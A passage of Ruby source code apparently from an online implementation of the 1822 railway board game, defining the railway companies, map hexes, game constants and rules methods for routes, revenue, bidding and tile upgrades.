text_color: 'black',
reservation_color: nil,
},
{
sym: '22',
name: 'Exeter and Crediton Railway',
logo: '1822/22',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'D41',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '23',
name: 'West Cornwall Railway',
logo: '1822/23',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'A42',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '24',
name: 'The Swansea and Mumbles Railway',
logo: '1822/24',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'D35',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: 'LNWR',
name: 'London and North West Railway',
logo: '1822/LNWR',
tokens: [0, 100],
type: 'major',
float_percent: 10,
shares: [10, 10, 10, 10, 10, 10, 10, 10, 10, 10],
always_market_price: true,
coordinates: 'M38',
city: 3,
color: '#000',
reservation_color: nil,
},
{
sym: 'GWR',
name: 'Great Western Railway',
logo: '1822/GWR',
tokens: [0, 100],
type: 'major',
float_percent: 20,
always_market_price: true,
coordinates: 'M38',
city: 1,
color: '#165016',
reservation_color: nil,
},
{
sym: 'LBSCR',
name: 'London, Brighton and South Coast Railway',
logo: '1822/LBSCR',
tokens: [0, 100],
type: 'major',
float_percent: 20,
always_market_price: true,
coordinates: 'M38',
city: 0,
color: '#cccc00',
text_color: 'black',
reservation_color: nil,
},
{
sym: 'SECR',
name: 'South Eastern & Chatham Railway',
logo: '1822/SECR',
tokens: [0, 100],
type: 'major',
float_percent: 20,
always_market_price: true,
coordinates: 'M38',
city: 5,
color: '#ff7f2a',
reservation_color: nil,
},
{
sym: 'CR',
name: 'Caledonian Railway',
logo: '1822/CR',
tokens: [0, 100],
type: 'major',
float_percent: 20,
always_market_price: true,
coordinates: 'E6',
color: '#5555ff',
reservation_color: nil,
},
{
sym: 'MR',
name: 'Midland Railway',
logo: '1822/MR',
tokens: [0, 100],
type: 'major',
float_percent: 20,
always_market_price: true,
coordinates: 'J29',
color: '#ff2a2a',
reservation_color: nil,
},
{
sym: 'LYR',
name: 'Lancashire & Yorkshire',
logo: '1822/LYR',
tokens: [0, 100],
type: 'major',
float_percent: 20,
always_market_price: true,
coordinates: 'G22',
color: '#2d0047',
reservation_color: nil,
},
{
sym: 'NBR',
name: 'North British Railway',
logo: '1822/NBR',
tokens: [0, 100],
type: 'major',
float_percent: 20,
always_market_price: true,
coordinates: 'H5',
color: '#a05a2c',
reservation_color: nil,
},
{
sym: 'SWR',
name: 'South Wales Railway',
logo: '1822/SWR',
tokens: [0, 100],
type: 'major',
float_percent: 20,
always_market_price: true,
coordinates: 'H33',
color: '#999999',
text_color: 'black',
reservation_color: nil,
},
{
sym: 'NER',
name: 'North Eastern Railway',
logo: '1822/NER',
tokens: [0, 100],
type: 'major',
float_percent: 20,
always_market_price: true,
coordinates: 'L19',
color: '#aade87',
reservation_color: nil,
},
].freeze
HEXES = {
white: {
%w[B39 C10 D9 E8 E12 F41 G2 G6 G26 G38 G40 H11 H27 H29 H31 H41 I6 I28 I34 I36 J9 J11 J13 J17 J27 J33
J35 J37 K8 K16 K18 K22 K26 K32 K34 K40 L15 L17 L23 L25 L27 L29 L31 L35 L41 M18 M20 M24 M32 M34 N19
N25 N31 N35 N41 O32 O34 P27 P29 P31 P33 Q28 Q32 Q34] =>
'',
['H43'] =>
'border=edge:4,type:impassable',
['D37'] =>
'border=edge:3,type:impassable;border=edge:4,type:impassable',
['N27'] =>
'border=edge:0,type:impassable;border=edge:5,type:impassable',
['E36'] =>
'border=edge:0,type:impassable;border=edge:1,type:impassable;border=edge:5,type:impassable',
['G10'] =>
'border=edge:0,type:water,cost:40',
['O38'] =>
'border=edge:2,type:water,cost:40;border=edge:3,type:water,cost:40;border=edge:5,type:impassable',
['N37'] =>
'border=edge:0,type:water,cost:40;border=edge:5,type:water,cost:40;stub=edge:1',
['L37'] =>
'stub=edge:5',
['L39'] =>
'stub=edge:4',
['M40'] =>
'stub=edge:3',
%w[C42 F39 L21 M28] =>
'upgrade=cost:20,terrain:swamp',
['O28'] =>
'upgrade=cost:20,terrain:swamp;border=edge:1,type:impassable;border=edge:2,type:impassable',
['E38'] =>
'upgrade=cost:20,terrain:swamp;border=edge:3,type:impassable',
['H35'] =>
'upgrade=cost:20,terrain:swamp;border=edge:2,type:water,cost:40',
['N39'] =>
'upgrade=cost:20,terrain:swamp;border=edge:3,type:water,cost:40;stub=edge:2',
['F37'] =>
'upgrade=cost:20,terrain:swamp;border=edge:2,type:impassable;border=edge:3,type:impassable',
%w[D43 I32 M22] =>
'upgrade=cost:40,terrain:swamp',
['N29'] =>
'upgrade=cost:40,terrain:swamp;border=edge:3,type:impassable;border=edge:4,type:impassable',
%w[B41 D39 G14 G30 H39 I12 I24 I38 J39] =>
'upgrade=cost:40,terrain:hill',
%w[C40 E10 F9 G8 H7 H9 H15 I8 I10 J7 J23 J25] =>
'upgrade=cost:60,terrain:hill',
%w[I14 I16 I18 I20 J19] =>
'upgrade=cost:80,terrain:mountain',
%w[C38 D11 E40 F3 F5 G20 G28 G32 G42 H13 H25 I26 J31 K12 K36 M16 M26 N33 O42] =>
'town=revenue:0',
%w[H17 P39] =>
'town=revenue:0;border=edge:2,type:impassable',
['H3'] =>
'town=revenue:0;border=edge:1,type:impassable;border=edge:0,type:water,cost:40',
['F11'] =>
'town=revenue:0;border=edge:5,type:impassable',
['O36'] =>
'town=revenue:0;border=edge:0,type:water,cost:40',
['M36'] =>
'town=revenue:0;stub=edge:0',
%w[F7 H21] =>
'town=revenue:0;town=revenue:0',
['H37'] =>
'town=revenue:0;town=revenue:0;upgrade=cost:20,terrain:swamp',
['O30'] =>
'town=revenue:0;upgrade=cost:20,terrain:swamp',
['G34'] =>
'town=revenue:0;upgrade=cost:20,terrain:swamp;border=edge:0,type:water,cost:40;'\
'border=edge:5,type:water,cost:40',
['G24'] =>
'town=revenue:0;upgrade=cost:40,terrain:swamp',
['I40'] =>
'town=revenue:0;upgrade=cost:40,terrain:hill',
['J21'] =>
'town=revenue:0;upgrade=cost:60,terrain:hill',
%w[D41 H19 J15 J29 J41 K10 K14 K20 K24 K28 K30 K38 L33 M30 P35 P41] =>
'city=revenue:0',
['I42'] =>
'city=revenue:0;border=edge:1,type:impassable',
['G4'] =>
'city=revenue:0;border=edge:4,type:impassable',
['G16'] =>
'city=revenue:0;border=edge:5,type:impassable',
['G12'] =>
'city=revenue:0;border=edge:2,type:impassable;border=edge:3,type:water,cost:40',
['D35'] =>
'city=revenue:20,loc:center;town=revenue:10,loc:1;path=a:_0,b:_1;border=edge:0,type:impassable;label=S',
['M38'] =>
'city=revenue:20;city=revenue:20;city=revenue:20;city=revenue:20;city=revenue:20;city=revenue:20;'\
'path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;path=a:5,b:_5;upgrade=cost:20;'\
'label=L',
%w[B43 K42 M42] =>
'city=revenue:0;label=T',
%w[L19 Q30] =>
'city=revenue:0;upgrade=cost:20,terrain:swamp',
%w[H23 H33] =>
'city=revenue:0;upgrade=cost:40,terrain:swamp',
['O40'] =>
'city=revenue:0;upgrade=cost:40,terrain:hill',
['N21'] =>
'city=revenue:0;upgrade=cost:20,terrain:swamp;border=edge:0,type:water,cost:40',
['N23'] =>
'city=revenue:0;upgrade=cost:20,terrain:swamp;border=edge:3,type:water,cost:40',
},
yellow: {
['F35'] =>
'city=revenue:30,slots:2;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;border=edge:0,type:impassable;'\
'border=edge:5,type:impassable;label=C',
['G22'] =>
'city=revenue:30,slots:2;path=a:0,b:_0;path=a:3,b:_0;path=a:5,b:_0;label=Y',
['G36'] =>
'city=revenue:30,slots:2;path=a:0,b:_0;path=a:4,b:_0;path=a:5,b:_0;border=edge:2,type:impassable;'\
'border=edge:3,type:water,cost:40;upgrade=cost:20,terrain:swamp;label=Y',
['H5'] =>
'city=revenue:30,slots:2;path=a:1,b:_0;path=a:2,b:_0;path=a:5,b:_0;border=edge:3,type:water,cost:40;'\
'label=Y',
['I22'] =>
'city=revenue:40,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:4,b:_0;upgrade=cost:60,terrain:hill;'\
'label=BM',
['I30'] =>
'city=revenue:40,slots:2;path=a:0,b:_0;path=a:2,b:_0;path=a:4,b:_0;upgrade=cost:40,terrain:swamp;'\
'label=BM',
['P43'] =>
'city=revenue:0;upgrade=cost:100;label=EC',
},
gray: {
['A42'] =>
'city=revenue:yellow_40|green_30|brown_30|gray_40,slots:2,loc:1.5;path=a:4,b:_0,terminal:1;'\
'path=a:5,b:_0,terminal:1',
['C34'] =>
'city=revenue:yellow_10|green_20|brown_30|gray_40,slots:2;path=a:5,b:_0,terminal:1',
['E2'] =>
'city=revenue:yellow_10|green_10|brown_20|gray_20,slots:2;path=a:0,b:_0,terminal:1;'\
'path=a:5,b:_0,terminal:1',
['E4'] =>
'path=a:0,b:3',
['E6'] =>
'city=revenue:yellow_40|green_50|brown_60|gray_70,slots:3,loc:1;path=a:0,b:_0;path=a:3,b:_0;'\
'path=a:4,b:_0;path=a:5,b:_0',
['E26'] =>
'path=a:0,b:4,lanes:2',
['E28'] =>
'city=revenue:yellow_10|green_20|brown_20|gray_30,slots:3;path=a:0,b:_0,lanes:2,terminal:1;'\
'path=a:3,b:_0,lanes:2,terminal:1;path=a:4,b:_0,lanes:2,terminal:1;path=a:5,b:_0,lanes:2,terminal:1',
['E30'] =>
'path=a:3,b:5,lanes:2',
['E32'] =>
'path=a:0,b:5',
['E34'] =>
'city=revenue:yellow_30|green_40|brown_30|gray_10,slots:2,loc:0;path=a:3,b:_0;'\
'path=a:4,b:_0,terminal:1;path=a:5,b:_0',
['F23'] =>
'city=revenue:yellow_20|green_20|brown_30|gray_40,slots:2;path=a:5,b:_0,terminal:1',
%w[F25 F27] =>
'path=a:1,b:4,a_lane:2.0;path=a:1,b:5,a_lane:2.1',
%w[F29 F31] =>
'path=a:2,b:4,a_lane:2.0;path=a:2,b:5,a_lane:2.1',
['F33'] =>
'city=revenue:yellow_20|green_40|brown_30|gray_10,slots:2,loc:4;path=a:1,b:_0;path=a:2,b:_0,terminal:1;'\
'path=a:5,b:_0',
['H1'] =>
'city=revenue:yellow_30|green_40|brown_50|gray_60,slots:2;path=a:0,b:_0,terminal:1;'\
'path=a:1,b:_0,terminal:1',
['Q44'] =>
'offboard=revenue:yellow_0|green_60|brown_90|gray_120,visit_cost:0;path=a:2,b:_0',
},
blue: {
%w[L11 J43 Q36 Q42 R31] =>
'junction;path=a:2,b:_0,terminal:1',
['F17'] =>
'junction;path=a:4,b:_0,terminal:1',
%w[F15 F21] =>
'junction;path=a:5,b:_0,terminal:1',
},
}.freeze
LAYOUT = :flat
SELL_MOVEMENT = :down_share
HOME_TOKEN_TIMING = :operate
MUST_BUY_TRAIN = :always
NEXT_SR_PLAYER_ORDER = :most_cash
SELL_AFTER = :operate
SELL_BUY_ORDER = :sell_buy
EVENTS_TEXT = {
'close_concessions' =>
['Concessions close', 'All concessions close without compensation, major companies now float at 50%'],
'full_capitalisation' =>
['Full capitalisation', 'Major companies now receives full capitalisation when floated'],
}.freeze
STATUS_TEXT = Base::STATUS_TEXT.merge(
'can_buy_trains' => ['Buy trains', 'Can buy trains from other corporations'],
'can_convert_concessions' => ['Convert concessions',
'Can float a major company by converting a concession'],
'can_acquire_minor_bidbox' => ['Acquire a minor from bidbox',
'Can acquire a minor from bidbox for £200, must have connection '\
'to start location'],
'can_par' => ['Majors 50% float', 'Majors companies require 50% sold to float'],
'full_capitalisation' => ['Full capitalisation', 'Majors receives full capitalisation '\
'(the remaining five shares are placed in the bank)'],
).freeze
BIDDING_BOX_MINOR_COUNT = 4
BIDDING_BOX_CONCESSION_COUNT = 3
BIDDING_BOX_PRIVATE_COUNT = 3
BIDDING_TOKENS = {
'3': 6,
'4': 5,
'5': 4,
'6': 3,
'7': 3,
}.freeze
BIDDING_TOKENS_PER_ACTION = 3
COMPANY_CONCESSION_PREFIX = 'C'
COMPANY_MINOR_PREFIX = 'M'
COMPANY_PRIVATE_PREFIX = 'P'
DESTINATIONS = {
'LNWR' => 'I22',
'GWR' => 'G36',
'LBSCR' => 'M42',
'SECR' => 'P41',
'CR' => 'G12',
'MR' => 'L19',
'LYR' => 'I22',
'NBR' => 'H1',
'SWR' => 'C34',
'NER' => 'H5',
}.freeze
EXCHANGE_TOKENS = {
'LNWR' => 4,
'GWR' => 3,
'LBSCR' => 3,
'SECR' => 3,
'CR' => 3,
'MR' => 3,
'LYR' => 3,
'NBR' => 3,
'SWR' => 3,
'NER' => 3,
}.freeze
# These trains don't count against train limit, they also don't count as a train
# against the mandatory train ownership. They cant the bought by another corporation.
EXTRA_TRAINS = %w[2P P+ LP].freeze
EXTRA_TRAIN_PULLMAN = 'P+'
EXTRA_TRAIN_PERMANENTS = %w[2P LP].freeze
LIMIT_TOKENS_AFTER_MERGER = 9
CARDIFF_HEX = 'F35'
LONDON_HEX = 'M38'
ENGLISH_CHANNEL_HEX = 'P43'
FRANCE_HEX = 'Q44'
FRANCE_HEX_BROWN_TILE = 'offboard=revenue:yellow_0|green_60|brown_90|gray_120,visit_cost:0;'\
'path=a:2,b:_0,lanes:2'
COMPANY_MTONR = 'P2'
COMPANY_EGR = 'P8'
COMPANY_GSWR = 'P10'
COMPANY_GSWR_DISCOUNT = 40
COMPANY_BER = 'P11'
COMPANY_LSR = 'P12'
MAJOR_TILE_LAYS = [{ lay: true, upgrade: true }, { lay: :not_if_upgraded, upgrade: false }].freeze
MERTHYR_TYDFIL_PONTYPOOL_HEX = 'F33'
MINOR_START_PAR_PRICE = 50
MINOR_BIDBOX_PRICE = 200
MINOR_GREEN_UPGRADE = %w[yellow green].freeze
MINOR_14_ID = '14'
PRIVATE_COMPANIES_ACQUISITION = {
'P1' => { acquire: %i[major], phase: 5 },
'P2' => { acquire: %i[major minor], phase: 2 },
'P3' => { acquire: %i[major], phase: 2 },
'P4' => { acquire: %i[major], phase: 2 },
'P5' => { acquire: %i[major], phase: 3 },
'P6' => { acquire: %i[major], phase: 3 },
'P7' => { acquire: %i[major], phase: 3 },
'P8' => { acquire: %i[major minor], phase: 3 },
'P9' => { acquire: %i[major minor], phase: 3 },
'P10' => { acquire: %i[major minor], phase: 3 },
'P11' => { acquire: %i[major minor], phase: 2 },
'P12' => { acquire: %i[major minor], phase: 3 },
'P13' => { acquire: %i[major minor], phase: 5 },
'P14' => { acquire: %i[major minor], phase: 5 },
'P15' => { acquire: %i[major minor], phase: 2 },
'P16' => { acquire: %i[none], phase: 0 },
'P17' => { acquire: %i[major], phase: 2 },
'P18' => { acquire: %i[major], phase: 5 },
}.freeze
PRIVATE_MAIL_CONTRACTS = %w[P6 P7].freeze
PRIVATE_REMOVE_REVENUE = %w[P5 P6 P7 P8 P10 P17 P18].freeze
PRIVATE_TRAINS = %w[P1 P3 P4 P13 P14].freeze
TOKEN_PRICE = 100
TRACK_PLAIN = %w[7 8 9 80 81 82 83 544 545 546 60 169].freeze
TRACK_TOWN = %w[3 4 58 141 142 143 144 145 146 147 X17].freeze
UPGRADABLE_S_YELLOW_CITY_TILE = '57'
UPGRADABLE_S_YELLOW_ROTATIONS = [2, 5].freeze
UPGRADABLE_S_HEX_NAME = 'D35'
UPGRADABLE_T_YELLOW_CITY_TILES = %w[5 6].freeze
UPGRADABLE_T_HEX_NAMES = %w[B43 K42 M42].freeze
UPGRADE_COST_L_TO_2 = 80
include StubsAreRestricted
attr_accessor :bidding_token_per_player, :player_debts
def all_potential_upgrades(tile, tile_manifest: false)
upgrades = super
return upgrades unless tile_manifest
upgrades |= [@green_s_tile] if self.class::UPGRADABLE_S_YELLOW_CITY_TILE == tile.name
upgrades |= [@green_t_tile] if self.class::UPGRADABLE_T_YELLOW_CITY_TILES.include?(tile.name)
upgrades |= [@sharp_city, @gentle_city] if self.class::UPGRADABLE_T_HEX_NAMES.include?(tile.hex.name)
upgrades
end
def bank_sort(corporations)
corporations.reject { |c| c.type == :minor }.sort_by(&:name)
end
def can_hold_above_limit?(_entity)
true
end
def can_par?(corporation, parrer)
return false if corporation.type == :minor ||
!(@phase.status.include?('can_convert_concessions') || @phase.status.include?('can_par'))
super
end
def can_run_route?(entity)
entity.trains.any? { |t| t.name == 'L' } || super
end
def check_distance(route, visits)
# Must visit both hex tiles to be a valid visit. If you are tokened out from france then you cant visit the
# EC tile either.
english_channel_visit = english_channel_visit(visits)
raise GameError, 'Must connect english channel to france' if english_channel_visit == 1
# Special case when a train just runs english channel to france, this only counts as one visit
raise GameError, 'Route must have at least 2 stops' if english_channel_visit == 2 && visits.size == 2
super
end
def check_overlap(routes)
# Tracks by e-train and normal trains
tracks_by_type = Hash.new { |h, k| h[k] = [] }
# Check local train not use the same token more then one time
local_token_hex = []
# Merthyr Tydfil and Pontypool
merthyr_tydfil_pontypool = {}
routes.each do |route|
local_token_hex << route.head[:left].hex.id if route.train.local? && !route.connections.empty?
route.paths.each do |path|
a = path.a
b = path.b
tracks = tracks_by_type[train_type(route.train)]
tracks << [path.hex, a.num, path.lanes[0][1]] if a.edge?
tracks << [path.hex, b.num, path.lanes[1][1]] if b.edge?
if b.edge? && a.town? && (nedge = a.tile.preferred_city_town_edges[a]) && nedge != b.num
tracks << [path.hex, a, path.lanes[0][1]]
end
if a.edge? && b.town? && (nedge = b.tile.preferred_city_town_edges[b]) && nedge != a.num
tracks << [path.hex, b, path.lanes[1][1]]
end
if path.hex.id == self.class::MERTHYR_TYDFIL_PONTYPOOL_HEX
merthyr_tydfil_pontypool[a.num] = true if a.edge?
merthyr_tydfil_pontypool[b.num] = true if b.edge?
end
end
end
tracks_by_type.each do |_type, tracks|
tracks.group_by(&:itself).each do |k, v|
raise GameError, "Route can't reuse track on #{k[0].id}" if v.size > 1
end
end
local_token_hex.group_by(&:itself).each do |k, v|
raise GameError, "Local train can only use the token on #{k[0]} once" if v.size > 1
end
# Check Merthyr Tydfil and Pontypool, only one of the 2 tracks may be used
return unless merthyr_tydfil_pontypool[1] && merthyr_tydfil_pontypool[2]
raise GameError, 'May only use one of the tracks connecting Merthyr Tydfil and Pontypool'
end
def company_bought(company, entity)
# On acquired abilities
# Will add more here when they are implemented
on_acquired_train(company, entity) if self.class::PRIVATE_TRAINS.include?(company.id)
on_aqcuired_remove_revenue(company) if self.class::PRIVATE_REMOVE_REVENUE.include?(company.id)
end
def company_status_str(company)
bidbox_minors.each_with_index do |c, index|
return "Bid box #{index + 1}" if c == company
end
bidbox_concessions.each_with_index do |c, index|
return "Bid box #{index + 1}" if c == company
end
bidbox_privates.each_with_index do |c, index|
return "Bid box #{index + 1}" if c == company
end
''
end
def compute_other_paths(routes, route)
routes.flat_map do |r|
next if r == route || train_type(route.train) != train_type(r.train)
r.paths
end
end
def crowded_corps
@crowded_corps ||= corporations.select do |c|
trains = c.trains.count { |t| !extra_train?(t) }
trains > train_limit(c)
end
end
def discountable_trains_for(corporation)
discount_info = super
corporation.trains.select { |t| t.name == 'L' }.each do |train|
discount_info << [train, train, '2', self.class::UPGRADE_COST_L_TO_2]
end
discount_info
end
def entity_can_use_company?(entity, company)
entity == company.owner
end
def event_close_concessions!
@log << '-- Event: Concessions close --'
@companies.select { |c| c.id[0] == self.class::COMPANY_CONCESSION_PREFIX && !c.closed? }.each(&:close!)
@corporations.select { |c| !c.floated? && c.type == :major }.each do |corporation|
corporation.par_via_exchange = nil
corporation.float_percent = 50
end
end
def event_full_capitalisation!
@log << '-- Event: Major companies now receives full capitalisation when floated --'
@corporations.select { |c| !c.floated? && c.type == :major }.each do |corporation|
corporation.capitalization = :full
end
end
def float_corporation(corporation)
super
return if [email protected]?('full_capitalisation') || corporation.type != :major
bundle = ShareBundle.new(corporation.shares_of(corporation))
@share_pool.transfer_shares(bundle, @share_pool)
@log << "#{corporation.name}'s remaining shares are transferred to the Market"
end
def format_currency(val)
return super if (val % 1).zero?
format('£%.1<val>f', val: val)
end
def home_token_locations(corporation)
[hex_by_id(self.class::LONDON_HEX)] if corporation.id == self.class::MINOR_14_ID
end
def issuable_shares(entity)
return [] if !entity.corporation? || (entity.corporation? && entity.type != :major)
return [] if entity.num_ipo_shares.zero? || entity.operating_history.size < 2
bundles_for_corporation(entity, entity)
.select { |bundle| @share_pool.fit_in_bank?(bundle) }
.map { |bundle| reduced_bundle_price_for_market_drop(bundle) }
end
def tile_lays(entity)
operator = entity.company? ? entity.owner : entity
if @phase.name.to_i >= 3 && operator.corporation? && operator.type == :major
return self.class::MAJOR_TILE_LAYS
end
super
end
def train_help(runnable_trains)
return [] if runnable_trains.empty?
entity = runnable_trains.first.owner
# L - trains
l_trains = !runnable_trains.select { |t| t.name == 'L' }.empty?
# Destination bonues
destination_token = nil
destination_token = entity.tokens.find { |t| t.used && t.type == :destination } if entity.type == :major
# Mail contract
mail_contracts = entity.companies.any? { |c| self.class::PRIVATE_MAIL_CONTRACTS.include?(c.id) }
help = []
help << "L (local) trains run in a city which has a #{entity.name} token. "\
'They can additionally run to a single small station, but are not required to do so. '\
'They can thus be considered 1 (+1) trains. '\
'Only one L train may operate on each station token.' if l_trains
help << 'When a train runs between its home station token and its destination station token it doubles the '\
'value of its destination station. This only applies to one train per operating '\
'turn.' if destination_token
help << 'Mail contract(s) gives a subsidy equal to one half of the base value of the start and end '\
'stations from one of the trains operated. Doubled values (for E trains or destination tokens) '\
'do not count.' if mail_contracts
help
end
def init_company_abilities
@companies.each do |company|
next unless (ability = abilities(company, :exchange))
next unless ability.from.include?(:par)
exchange_corporations(ability).first.par_via_exchange = company
end
super
end
def init_round
stock_round
end
def must_buy_train?(entity)
entity.trains.none? { |t| !extra_train?(t) } &&
!depot.depot_trains.empty?
end
# TODO: [1822] Make include with 1861, 1867
def operating_order
minors, majors = @corporations.select(&:floated?).sort.partition { |c| c.type == :minor }
minors + majors
end
def operating_round(round_num)
Engine::Round::Operating.new(self, [
G1822::Step::PendingToken,
G1822::Step::FirstTurnHousekeeping,
Engine::Step::AcquireCompany,
Engine::Step::DiscardTrain,
G1822::Step::SpecialChoose,
G1822::Step::SpecialTrack,
G1822::Step::Track,
G1822::Step::DestinationToken,
G1822::Step::Token,
G1822::Step::Route,
G1822::Step::Dividend,
G1822::Step::BuyTrain,
G1822::Step::MinorAcquisition,
G1822::Step::PendingToken,
Engine::Step::DiscardTrain,
G1822::Step::IssueShares,
], round_num: round_num)
end
def place_home_token(corporation)
return if corporation.tokens.first&.used
super
# Special for LNWR, it gets its destination token. But wont get the bonus until home
# and destination is connected
return unless corporation.id == 'LNWR'
hex = hex_by_id(self.class::DESTINATIONS[corporation.id])
token = corporation.find_token_by_type(:destination)
place_destination_token(corporation, hex, token)
end
def player_value(player)
player.value - @player_debts[player]
end
def purchasable_companies(entity = nil)
return [] unless entity
@companies.select do |company|
company.owner&.player? && entity != company.owner && !company.closed? && !abilities(company, :no_buy) &&
acquire_private_company?(entity, company)
end
end
def redeemable_shares(entity)
return [] if !entity.corporation? || (entity.corporation? && entity.type != :major)
bundles_for_corporation(@share_pool, entity).reject { |bundle| entity.cash < bundle.price }
end
def revenue_for(route, stops)
raise GameError, 'Route visits same hex twice' if route.hexes.size != route.hexes.uniq.size
revenue = if train_type(route.train) == :normal
super
else
entity = route.train.owner
france_stop = stops.find { |s| s.offboard? && s.hex.name == self.class::FRANCE_HEX }
stops.sum do |stop|
next 0 unless stop.city?
tokened = stop.tokened_by?(entity)
# If we got a token in English channel, calculate the revenue from the france offboard
if tokened && stop.hex.name == self.class::ENGLISH_CHANNEL_HEX
france_stop ? france_stop.route_revenue(route.phase, route.train) : 0
elsif tokened
stop.route_revenue(route.phase, route.train)
else
0
end
end
end
destination_bonus = destination_bonus(route.routes)
revenue += destination_bonus[:revenue] if destination_bonus && destination_bonus[:route] == route
revenue
end
def revenue_str(route)
str = super
destination_bonus = destination_bonus(route.routes)
if destination_bonus && destination_bonus[:route] == route
str += " (#{format_currency(destination_bonus[:revenue])})"
end
str
end
def routes_subsidy(routes)
return 0 if routes.empty?
mail_bonus = mail_contract_bonus(routes.first.train.owner, routes)
return 0 if mail_bonus.empty?
mail_bonus.sum do |v|
v[:subsidy]
end
end
def route_trains(entity)
entity.runnable_trains.reject { |t| pullman_train?(t) }
end
def setup
# Setup the bidding token per player
@bidding_token_per_player = init_bidding_token
# Init all the special upgrades
@sharp_city ||= @tiles.find { |t| t.name == '5' }
@gentle_city ||= @tiles.find { |t| t.name == '6' }
@green_s_tile ||= @tiles.find { |t| t.name == 'X3' }
@green_t_tile ||= @tiles.find { |t| t.name == '405' }
# Initialize the extra city which minor 14 might add
@london_extra_city_index = nil
# Initialize the player depts, if player have to take an emergency loan
@player_debts = Hash.new { |h, k| h[k] = 0 }
# Randomize and setup the companies
setup_companies
# Setup the fist bidboxes
setup_bidboxes
# Setup exchange token abilities for all corporations
setup_exchange_tokens
# Setup all the destination tokens, icons and abilities
setup_destinations
end
def sorted_corporations
ipoed, others = @corporations.select { |c| c.type == :major }.partition(&:ipoed)
ipoed.sort + others
end
def stock_round
G1822::Round::Stock.new(self, [
Engine::Step::DiscardTrain,
G1822::Step::BuySellParShares,
])
end
def unowned_purchasable_companies(_entity)
minors = bank_companies(self.class::COMPANY_MINOR_PREFIX)
concessions = bank_companies(self.class::COMPANY_CONCESSION_PREFIX)
privates = bank_companies(self.class::COMPANY_PRIVATE_PREFIX)
minors + concessions + privates
end
def upgrade_cost(tile, hex, entity)
abilities = entity.all_abilities.select do |a|
a.type == :tile_discount && (!a.hexes || a.hexes.include?(hex.name))
end
tile.upgrades.sum do |upgrade|
total_cost = upgrade.cost
abilities.each do |ability|
discount = ability && upgrade.terrains.uniq == [ability.terrain] ? ability.discount : 0
log_cost_discount(entity, ability, discount)
total_cost -= discount
end
total_cost
end
end
def upgrades_to?(from, to, special = false)
# Check the S hex and potential upgrades
if self.class::UPGRADABLE_S_HEX_NAME == from.hex.name && from.color == :white
return self.class::UPGRADABLE_S_YELLOW_CITY_TILE == to.name
end
if self.class::UPGRADABLE_S_HEX_NAME == from.hex.name &&
self.class::UPGRADABLE_S_YELLOW_CITY_TILE == from.name
return to.name == 'X3'
end
# Check the T hexes and potential upgrades
if self.class::UPGRADABLE_T_HEX_NAMES.include?(from.hex.name) && from.color == :white
return self.class::UPGRADABLE_T_YELLOW_CITY_TILES.include?(to.name)
end
if self.class::UPGRADABLE_T_HEX_NAMES.include?(from.hex.name) &&
self.class::UPGRADABLE_T_YELLOW_CITY_TILES.include?(from.name)
return to.name == '405'
end
# Special case for Middleton Railway where we remove a town from a tile
if self.class::TRACK_TOWN.include?(from.name) && self.class::TRACK_PLAIN.include?(to.name)
return Engine::Tile::COLORS.index(to.color) == (Engine::Tile::COLORS.index(from.color) + 1)
end
super
end
def acquire_private_company?(entity, company)
company_acquisition = self.class::PRIVATE_COMPANIES_ACQUISITION[company.id]
return false unless company_acquisition
@phase.name.to_i >= company_acquisition[:phase] && company_acquisition[:acquire].include?(entity.type)
end
def add_interest_player_loans!
@player_debts.each do |player, loan|
next unless loan.positive?
interest = player_loan_interest(loan)
new_loan = loan + interest
@player_debts[player] = new_loan
@log << "#{player.name} increases its loan by 50% (#{format_currency(interest)}) to "\
"#{format_currency(new_loan)}"
end
end
def after_place_pending_token(city)
return unless city.hex.name == self.class::LONDON_HEX
# Save the extra token city index in london. We need this if we acquire the minor 14 and chooses to remove
# the token from london. The city where the 14's home token used to be is now open for other companies to
# token. If we do an upgrade to london, make sure this city still is open.
@london_extra_city_index = city.tile.cities.index { |c| c == city }
end
def after_lay_tile(hex, tile)
# If we upgraded london, check if we need to add the extra slot from minor 14
upgrade_london(hex) if hex.name == self.class::LONDON_HEX
# If we upgraded the english channel to brown, upgrade france as well since we got 2 lanes to france.
return unless hex.name == self.class::ENGLISH_CHANNEL_HEX && tile.color == :brown
upgrade_france_to_brown
end
def after_track_pass(entity)
return unless entity.type == :major
# Special case of when we only used up one of the 2 track lays of private Leicester & Swannington Railway
company = entity.companies.find { |c| c.id == self.class::COMPANY_LSR }
return unless company
count = company.all_abilities.find { |a| a.type == :tile_lay }&.count
return if !count || count == 2
@log << "#{company.name} closes"
company.close!
end
def bank_companies(prefix)
@companies.select do |c|
c.id[0] == prefix && (!c.owner || c.owner == @bank) && !c.closed?
end
end
def bidbox_minors
bank_companies(self.class::COMPANY_MINOR_PREFIX).first(self.class::BIDDING_BOX_MINOR_COUNT)
end
def bidbox_concessions
bank_companies(self.class::COMPANY_CONCESSION_PREFIX).first(self.class::BIDDING_BOX_CONCESSION_COUNT)
end
def bidbox_privates
bank_companies(self.class::COMPANY_PRIVATE_PREFIX).first(self.class::BIDDING_BOX_PRIVATE_COUNT)
end
def can_gain_extra_train?(entity, train)
if train.name == self.class::EXTRA_TRAIN_PULLMAN
return false if entity.trains.any? { |t| t.name == self.class::EXTRA_TRAIN_PULLMAN }
elsif self.class::EXTRA_TRAIN_PERMANENTS.include?(train.name)
return false if entity.trains.any? { |t| self.class::EXTRA_TRAIN_PERMANENTS.include?(t.name) }
end
true
end
def calculate_destination_bonus(route)
entity = route.train.owner
# Only majors can have a destination token
return nil unless entity.type == :major
# Check if the corporation have placed its destination token
destination_token = entity.tokens.find { |t| t.used && t.type == :destination }
return nil unless destination_token
# First token is always the hometoken
home_token = entity.tokens.first
token_count = 0
route.visited_stops.each do |stop|
next unless stop.city?
